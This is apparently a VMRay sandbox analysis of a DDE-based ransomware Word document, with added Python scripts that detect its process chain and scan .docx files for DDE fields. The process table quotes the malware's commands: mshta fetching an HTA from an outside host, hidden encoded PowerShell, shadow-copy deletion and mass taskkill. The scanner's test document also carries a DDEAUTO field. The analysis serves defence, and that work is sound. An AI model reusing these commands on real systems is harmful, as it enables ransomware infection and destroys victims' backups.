DDE Ransomware in a Macro-less Word document | VMRay Analyzer Report
Analysis Information
Creation Time 2017-10-16 16:26 (UTC+2)
VM Analysis Duration Time 00:02:37
Execution Successful True
Sample Filename DDEv2.docx
Command Line Parameters False
Prescript False
Number of Processes 41
Termination Reason Timeout
Reputation Enabled True
VTI Information
VTI Score
100 / 100
VTI Database Version 2.6
VTI Rule Match Count 27
VTI Rule Type Documents
Tags
#DDE #Ransomware #Macro_less
Remarks
Critical The operating system was rebooted during the analysis.
Critical The overall sleep time of all monitored processes was truncated from 10.51 milliseconds to 1.0 milliseconds to reveal dormant functionality.
Monitored Processes
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x8d4 Analysis Target Medium winword.exe "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE"
#2 0x9c0 Child Process Medium mshta.exe C:\Programs\Microsoft\Office\MSword.exe\..\..\..\..\windows\system32\mshta.exe http://w-szczecin.pl/img2/NEW15_10.doc/index.hta #1
#4 0xa28 Child Process Medium cmd.exe "C:\Windows\system32\cmd.exe" "/c powershell.exe -ExeCUtIonPolIcY bypass -WINdowSTYLE hiddEn -ENCodedcOMMANd <encoded command elided> " #2
#5 0xa40 Child Process Medium powershell.exe powershell.exe -ExeCUtIonPolIcY bypass -WINdowSTYLE hiddEn -ENCodedcOMMANd <encoded command elided> " #4
#6 0xa6c Child Process Medium powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle minimized -command #5
#7 0xa90 Child Process Medium nvss.exe "C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe" #5
#8 0xad4 Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" vssadmin.exe Delete Shadows /All /Quiet #7
#10 0xbb0 Child Process Medium cmd.exe cmd /c ""C:\Users\kFT6uTQW\AppData\Roaminghhfhqi2h.wln.bat"" #7
#11 0xbc4 Child Process Medium taskkill.exe TASKKILL /F /IM ApacheMonitor.exe /IM ApacheMonitor.exe #10
#13 0x668 Child Process Medium taskkill.exe TASKKILL /F /IM armsvc.exe /IM armsvc.exe #10
#14 0x838 Child Process Medium taskkill.exe TASKKILL /F /IM BackOffice.exe /IM BackOffice.exe #10
#15 0x8f0 Child Process Medium taskkill.exe TASKKILL /F /IM CodeMeter.exe /IM CodeMeter.exe #10
#16 0x948 Child Process Medium taskkill.exe TASKKILL /F /IM fbserver.exe /IM fbserver.exe #10
#17 0x82c Child Process Medium taskkill.exe TASKKILL /F /IM fdhost.exe /IM fdhost.exe #10
#18 0x87c Child Process Medium taskkill.exe TASKKILL /F /IM fdlauncher.exe /IM fdlauncher.exe #10
#19 0x8b4 Child Process Medium taskkill.exe TASKKILL /F /IM GLDS.exe /IM GLDS.exe #10
#20 0x83c Child Process Medium taskkill.exe TASKKILL /F /IM grym.exe /IM grym.exe #10
#21 0x114 Child Process Medium taskkill.exe TASKKILL /F /IM httpd.exe /IM httpd.exe #10
#22 0x148 Child Process Medium taskkill.exe TASKKILL /F /IM igfxCUIService.exe /IM igfxCUIService.exe #10
#23 0x108 Child Process Medium taskkill.exe TASKKILL /F /IM iikoNet.Pos.WinService.exe /IM iikoNet.Pos.WinService.exe #10
#24 0x9ac Child Process Medium taskkill.exe TASKKILL /F /IM mdm.exe /IM mdm.exe #10
#25 0xa0c Child Process Medium taskkill.exe TASKKILL /F /IM MsDtsSrvr.exe /IM MsDtsSrvr.exe #10
#26 0xa18 Child Process Medium taskkill.exe TASKKILL /F /IM msmdsrv.exe /IM msmdsrv.exe #10
#27 0x16c Child Process Medium taskkill.exe TASKKILL /F /IM MSSQLSERVER.exe /IM MSSQLSERVER.exe #10
#28 0xfc Child Process Medium taskkill.exe TASKKILL /F /IM oktell.ClientStarter4.exe /IM oktell.ClientStarter4.exe #10
#29 0x584 Child Process Medium taskkill.exe TASKKILL /F /IM oktell.HALMixerApp.exe /IM oktell.HALMixerApp.exe #10
#30 0xa24 Child Process Medium taskkill.exe TASKKILL /F /IM OSPPSVC.exe /IM OSPPSVC.exe #10
#31 0xa78 Child Process Medium taskkill.exe TASKKILL /F /IM PresentationFontCache.exe /IM PresentationFontCache.exe #10
#32 0xa9c Child Process Medium taskkill.exe TASKKILL /F /IM SQL Server.exe /IM SQL Server.exe #10
#33 0xa44 Child Process Medium taskkill.exe TASKKILL /F /IM SQLAGENT.exe /IM SQLAGENT.exe #10
#34 0xa8c Child Process Medium taskkill.exe TASKKILL /F /IM sqlbrowser.exe /IM sqlbrowser.exe #10
#35 0xa38 Child Process Medium taskkill.exe TASKKILL /F /IM sqlservr.exe /IM sqlservr.exe #10
#36 0x604 Child Process Medium taskkill.exe TASKKILL /F /IM sqlwriter.exe /IM sqlwriter.exe #10
#37 0x7b0 Child Process Medium taskkill.exe TASKKILL /F /IM srvany.exe /IM srvany.exe #10
#38 0xbd8 Child Process Medium taskkill.exe TASKKILL /F /IM tomcat7.exe /IM tomcat7.exe #10
#39 0x61c Child Process Medium taskkill.exe TASKKILL /F /IM tomcat7_x64.exe /IM tomcat7_x64.exe #10
#40 0x8e4 Child Process Medium taskkill.exe TASKKILL /F /IM torgsoft.exe /IM torgsoft.exe #10
#41 0x8dc Child Process Medium taskkill.exe TASKKILL /F /IM TSAppServer.exe /IM TSAppServer.exe #10
#42 0x8f0 Child Process Medium taskkill.exe TASKKILL /F /IM p2.exe /IM p2.exe #10
#43 0x82c Child Process Medium taskkill.exe TASKKILL /F /IM taskmgr.exe /IM taskmgr.exe #10
#44 0x87c Child Process Medium vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet #10
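The table above shows the whole chain. WINWORD.EXE (#1) launches mshta.exe (#2) from a DDE field; the launcher path is written as C:\Programs\Microsoft\Office\MSword.exe\..\..\..\..\windows\system32\mshta.exe so that the DDE prompt shows an Office-looking path while Win32 path normalisation (which collapses ".." lexically, without the intermediate directories having to exist) resolves it to system32\mshta.exe. mshta fetches index.hta from the remote host, which runs cmd.exe (#4) and a hidden, ExecutionPolicy-bypass, encoded PowerShell (#5); that drops and runs nvss.exe (#7) from the user's AppData\Roaming, which deletes shadow copies (#8, #44) and runs a batch file (#10) that taskkills SQL Server, Apache, Tomcat, POS and other server processes, the usual aim being to release file locks before encryption. The script below is an added example, not code from the report or from VMRay: it encodes each of those behaviours as a rule and runs them over a re-typed subset of the table (constructed sample data; rule names, the Proc record and the taskkill threshold are assumptions, and the encoded payload stays elided as it is on the page).

```python
"""Triage a sandbox process tree for the DDE-to-ransomware chain in this report.

Hypothetical example: rule names, thresholds and the Proc record are assumptions,
not VMRay's VTI rules.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Set


@dataclass
class Proc:
    pid: int                 # the report's process ID (#n), not the OS PID
    image: str
    cmdline: str
    parent: Optional[int]    # origin ID; None for the analysis target


# Constructed sample: a subset of the "Monitored Processes" table above, re-typed so
# the script runs offline. The encoded PowerShell payload is elided on the page and
# elided here; the .bat file name is a stand-in.
SAMPLE = [
    Proc(1, "winword.exe", r'"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE"', None),
    Proc(2, "mshta.exe", r"C:\Programs\Microsoft\Office\MSword.exe\..\..\..\..\windows\system32\mshta.exe http://w-szczecin.pl/img2/NEW15_10.doc/index.hta", 1),
    Proc(4, "cmd.exe", r'"C:\Windows\system32\cmd.exe" "/c powershell.exe -ExeCUtIonPolIcY bypass -WINdowSTYLE hiddEn -ENCodedcOMMANd <elided>"', 2),
    Proc(5, "powershell.exe", r"powershell.exe -ExeCUtIonPolIcY bypass -WINdowSTYLE hiddEn -ENCodedcOMMANd <elided>", 4),
    Proc(6, "powershell.exe", r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle minimized -command', 5),
    Proc(7, "nvss.exe", r'"C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe"', 5),
    Proc(8, "cmd.exe", r'"C:\Windows\System32\cmd.exe" vssadmin.exe Delete Shadows /All /Quiet', 7),
    Proc(10, "cmd.exe", r'cmd /c ""C:\Users\kFT6uTQW\AppData\Roaming\standin.bat""', 7),
    Proc(11, "taskkill.exe", "TASKKILL /F /IM sqlservr.exe /IM sqlservr.exe", 10),
    Proc(13, "taskkill.exe", "TASKKILL /F /IM httpd.exe /IM httpd.exe", 10),
    Proc(14, "taskkill.exe", "TASKKILL /F /IM taskmgr.exe /IM taskmgr.exe", 10),
    Proc(44, "vssadmin.exe", "vssadmin.exe Delete Shadows /All /Quiet", 10),
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "rundll32.exe", "regsvr32.exe", "certutil.exe"}


def _first_token(cmdline: str) -> str:
    """The executable path: the quoted first argument, or the first whitespace token."""
    s = cmdline.strip()
    if s.startswith('"') and s.find('"', 1) > 0:
        return s[1:s.find('"', 1)]
    return s.split()[0] if s else ""


def _switch_prefix(token: str, full: str, min_len: int = 1) -> bool:
    """PowerShell accepts any unambiguous, case-insensitive prefix of a parameter
    name, so -e, -enc and -ENCodedcOMMANd are the same switch: match on prefix."""
    if not token.startswith("-"):
        return False
    t = token.lstrip("-").lower()
    return len(t) >= min_len and full.startswith(t)


def analyze(procs: List[Proc]) -> Dict[str, List[int]]:
    by_id = {p.pid: p for p in procs}
    findings: Dict[str, List[int]] = defaultdict(list)

    def has_office_ancestor(p: Proc) -> bool:
        while p.parent is not None and p.parent in by_id:
            p = by_id[p.parent]
            if p.image.lower() in OFFICE:
                return True
        return False

    for p in procs:
        img = p.image.lower()
        toks = p.cmdline.split()
        low = [t.lower() for t in toks]
        parent = by_id.get(p.parent) if p.parent is not None else None

        # 1. Office application spawning a script host or shell. DDE needs no macro,
        #    so "macros disabled" does not cover this; the child process is the signal.
        if parent is not None and parent.image.lower() in OFFICE and img in SCRIPT_HOSTS:
            findings["office_spawns_script_host"].append(p.pid)

        # 2. A bogus prefix walked back with "..": the DDE prompt shows "MSword.exe"
        #    while path normalisation resolves to system32\mshta.exe.
        if re.search(r"\\\.\.\\", p.cmdline):
            findings["dotdot_path_disguise"].append(p.pid)

        # 3. PowerShell with an encoded command, ExecutionPolicy bypass or a hidden
        #    window; the wrapper cmd.exe line carries the same arguments, so it is
        #    checked too.
        if "powershell" in p.cmdline.lower():
            if any(_switch_prefix(t, "encodedcommand") or t.lower() == "-ec" for t in toks):
                findings["powershell_encoded"].append(p.pid)
            for t, nxt in zip(low, low[1:]):
                if _switch_prefix(t, "executionpolicy", 2) and nxt == "bypass":
                    findings["powershell_bypass"].append(p.pid)
                if _switch_prefix(t, "windowstyle") and nxt == "hidden":
                    findings["powershell_hidden"].append(p.pid)

        # 4. Shadow copy deletion, run directly or through cmd.exe.
        if re.search(r"(?i)\bvssadmin(\.exe)?\s+delete\s+shadows\b", p.cmdline):
            findings["shadow_copy_deletion"].append(p.pid)

        # 5. Payload executed from the user profile's AppData under an Office ancestor.
        if re.search(r"(?i)\\appdata\\", _first_token(p.cmdline)) and has_office_ancestor(p):
            findings["office_descendant_runs_from_appdata"].append(p.pid)

    # 6. Burst of taskkill /IM against several images from one parent: ransomware
    #    stopping database and server processes so their files can be encrypted.
    targets: Dict[Optional[int], Set[str]] = defaultdict(set)
    for p in procs:
        if p.image.lower() == "taskkill.exe":
            targets[p.parent].update(m.lower() for m in re.findall(r"(?i)/IM\s+(\S+)", p.cmdline))
    for parent_id, imgs in targets.items():
        if parent_id is not None and len(imgs) >= 3:     # threshold is an assumption
            findings["taskkill_burst"].append(parent_id)

    return {k: sorted(v) for k, v in findings.items()}


if __name__ == "__main__":
    for rule, ids in analyze(SAMPLE).items():
        print(f"{rule}: {ids}")
```

Rule 3 deliberately matches switch prefixes rather than full names: the sample's mixed-case `-ENCodedcOMMANd` and `-WINdowSTYLE` are the same switches as `-e` and `-w`, and a detection keyed on the spelled-out parameter would miss them. Rule 5 keys on the executable path, not the whole command line, so the cmd.exe wrapper that merely names a batch file under AppData is not counted as the payload.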
Sample Information
ID #19692
MD5 Hash Value 5786dbcbe1959b2978e979bf1c5cb450
SHA1 Hash Value 0dd5a58e89036beaa7a63c9f5541bf1402c9c4d4
SHA256 Hash Value bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9
Filename DDEv2.docx
File Size 21.50 KB (22016 bytes)
File Type Word Document
Has VBA Macros False
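"Has VBA Macros: False" is the point of this sample. The launcher is a DDE/DDEAUTO field code, which Word offers to update when the document is opened (after a prompt) with no macro involved, so macro blocking and VBA-oriented static checks do not see it. A static triage step that does is to unzip the .docx and reassemble every field code: the keyword can be split across several w:instrText runs and the field can sit in a header or footer rather than document.xml, so the scanner joins runs and walks every XML part. The script below is an added example, not VMRay's or the sample's code; the documents it builds are constructed in-memory stand-ins (one carries a DDEAUTO field pointing cmd.exe at calc.exe, used only as scanner input), and the helper names are assumptions.

```python
"""Static check for DDE / DDEAUTO field codes in an OOXML (.docx) package.

Hypothetical example: the sample-document builders are assumptions so the scan
runs offline; they are not Word's own output.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple
from xml.sax.saxutils import escape

W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
FLD_SIMPLE, FLD_CHAR, INSTR = f"{{{W}}}fldSimple", f"{{{W}}}fldChar", f"{{{W}}}instrText"
# Word updates DDE and DDEAUTO fields without running a macro, so either keyword
# anywhere in a reassembled field code is the finding.
DDE_RE = re.compile(r"(?i)\bDDE(?:AUTO)?\b")


def _field_codes(root: ET.Element) -> List[str]:
    """Reassemble every field code in one part: join the instrText runs between a
    fldChar begin and its separate/end, and read w:instr on simple fields."""
    codes, buf, depth, collecting = [], [], 0, False
    for el in root.iter():                      # document order
        if el.tag == FLD_SIMPLE:
            codes.append(el.get(f"{{{W}}}instr", ""))
        elif el.tag == FLD_CHAR:
            kind = el.get(f"{{{W}}}fldCharType")
            if kind == "begin":
                depth += 1
                if depth == 1:
                    buf, collecting = [], True
            elif kind == "separate" and depth == 1:
                collecting = False              # result text follows, not code
            elif kind == "end" and depth > 0:
                depth -= 1
                if depth == 0:
                    codes.append("".join(buf))
                    collecting = False
        elif el.tag == INSTR and collecting:
            buf.append(el.text or "")
    return codes


def find_dde_fields(docx: bytes) -> List[Tuple[str, str]]:
    """Return (part name, normalised field code) for each DDE/DDEAUTO field.
    Every XML part under word/ is scanned: headers, footers, footnotes, comments."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue
            for code in _field_codes(root):
                if DDE_RE.search(code):
                    hits.append((name, " ".join(code.split())))
    return hits


# --- constructed sample documents (stand-ins, not real Word output) ----------------

def _part_xml(runs: List[str], simple_instr: str) -> bytes:
    """One paragraph with a complex field whose code is split over `runs`, and one
    paragraph with a simple field carrying `simple_instr`."""
    field = '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    field += "".join(f'<w:r><w:instrText xml:space="preserve">{escape(r)}</w:instrText></w:r>'
                     for r in runs)
    field += ('<w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:t>x</w:t></w:r>'
              '<w:r><w:fldChar w:fldCharType="end"/></w:r>')
    attr = escape(simple_instr, {'"': "&quot;"})
    simple = f'<w:fldSimple w:instr="{attr}"><w:r><w:t>y</w:t></w:r></w:fldSimple>'
    return (f'<?xml version="1.0" encoding="UTF-8"?><w:document xmlns:w="{W}">'
            f'<w:body><w:p>{field}</w:p><w:p>{simple}</w:p></w:body></w:document>').encode()


def build_sample_docx(parts: Dict[str, List[str]], simple_instr: str = " DATE ") -> bytes:
    """Minimal package with one XML part per entry. Enough for the scanner; Word
    itself would also expect [Content_Types].xml and the relationship parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, runs in parts.items():
            zf.writestr(name, _part_xml(runs, simple_instr))
    return buf.getvalue()


if __name__ == "__main__":
    # Keyword split across three runs and placed in a header: reassembled and found.
    evil = build_sample_docx({
        "word/document.xml": [" PAGE "],
        "word/header1.xml": ["DDE", "AUTO c:\\\\windows\\\\system32\\\\cmd.exe ", '"/k calc.exe"'],
    })
    print(find_dde_fields(evil))
    print(find_dde_fields(build_sample_docx({"word/document.xml": [" PAGE "]})))
```

Matching on the reassembled code rather than on raw XML is what defeats the run-splitting trick; matching on every part rather than document.xml alone is what catches fields tucked into headers and footers. The check is a triage signal, not a verdict: a QUOTE field whose text happens to contain "DDE" would also match, so hits should be read by a human.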
Analyzer and Virtual Machine Information
Analyzer Version 2.2.0
Analyzer Build Date 2017-09-28 17:24
Microsoft Office Version 2007
Microsoft Word Version 12.0.4518.1014
Internet Explorer Version 8.0.7601.17514
Chrome Version 59.0.3071.104
Firefox Version 25.0
Flash Version 10.3.183.86
Java Version 7.0.550
VM Name win7_64_sp1-mso2007
VM Architecture x86 64-bit
VM OS Windows 7
VM Kernel Version 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa)